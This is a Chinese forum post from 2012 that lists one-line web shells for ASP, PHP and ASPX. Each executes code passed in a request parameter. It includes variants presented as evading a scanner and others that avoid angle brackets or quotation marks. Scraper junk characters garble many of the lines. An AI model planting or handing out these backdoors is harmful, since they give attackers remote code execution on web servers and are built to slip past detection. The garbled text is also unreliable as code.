asp一句话 <%execute(request("1"))%> ; V/ a! s G) c8 B3 @6 |3 J
) p$ U* g1 @, T$ z! a) Bphp一句话 <?php eval($_POST[1]);?> 6 w/ {- m- L+ A4 u3 H4 M! K( `, s1 Q7 T* B
7 r: m$ P: S$ S+ ]aspx一句话
/ q) j0 R. |. P4 l% W- i: L5 M n+ P8 i O6 e: @% @/ {' o$ h
<script language="C#" runat="server">8 \/ d. q" \: m& Y
' s+ ^' \# t$ ]3 Q, RWebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y ("add6bb58e139be10");
+ w2 l) q0 |. J2 |/ b& R0 Q E, h+ \9 x' k$ U- s' D
</script>
0 q, _- f- T8 @9 d, F- {" w; L& G8 g5 M" ^/ q; i5 B
可以躲过雷客图的一句话。* J* F! x- y+ t. ^3 ?3 V1 t* |, R
d7 O$ `: N7 g, }% p) f <%
9 L. H s& w/ z0 v6 _ h8 R9 j! B7 ~
set ms = server.CreateObject("MSScriptControl.ScriptControl.1") d& Y5 b+ g6 E) m i
% y! u) G& }' r1 y. W- g: ~: h* o
ms.Language="VBScript"
X& O4 j) ^$ C8 f* X: `! `* F b' X
ms.AddObject "Response", Response: [0 H& K& S% N+ e( s: H
9 s0 P9 F4 H, x! [* D6 d" B
ms.AddObject "request", request( V1 n. i0 R- Y& M' f5 v" e# \
9 ^3 K" S5 w' S4 \& _0 T* e7 q ms.ExecuteStatement("ev"&"al(request(""1""))")9 W+ Y7 p4 M. [. E! ]% V" b$ [% o5 J
; A! ]! g# M/ A
%>
" }; X0 e: L/ m7 w; c% p. W1 `# G) c) m: G
不用'<,>'的asp一句话
+ P/ `' G- \4 i2 {5 T# e1 O9 Y* p" l& {& U5 N! [" b6 ]
<script language=VBScript runat=server>execute request("1")</script>( R9 b6 N, \9 t
3 }; A. M; g2 i4 B. }* N 不用双引号的一句话。4 k+ ~; b" F+ J( p: M* Q( Q
( L: n Z1 a3 K0 T0 `% H
<%eval request(chr(35))%>
) E$ R i! e: g2 ~6 { |
发表于 2012-9-23 14:36:09
收藏
支持
反对